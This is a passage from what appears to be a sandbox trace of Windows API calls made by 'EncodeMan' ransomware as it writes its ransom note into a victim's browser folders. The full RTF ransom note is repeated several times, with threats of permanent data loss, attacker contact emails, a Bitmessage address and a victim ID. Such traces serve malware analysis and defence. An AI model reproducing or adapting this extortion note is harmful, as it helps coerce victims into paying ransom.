n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nù^=«\x16O\x1fïж>\x9bXË\x7fEóO¸Ù\x0c0\x9a\x03\x1f", lpUsedDefaultChar=0x0) returned 8717 [0281.654] WriteFile (in: hFile=0x2c8, lpBuffer=0x245c778*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x245c778*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0281.655] CloseHandle (hObject=0x2c8) returned 1 [0281.655] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\#readme_eman#.rtf")) returned 0xffffffff [0281.655] GetLastError () returned 0x2 [0281.655] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0281.657] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0281.657] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0281.657] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 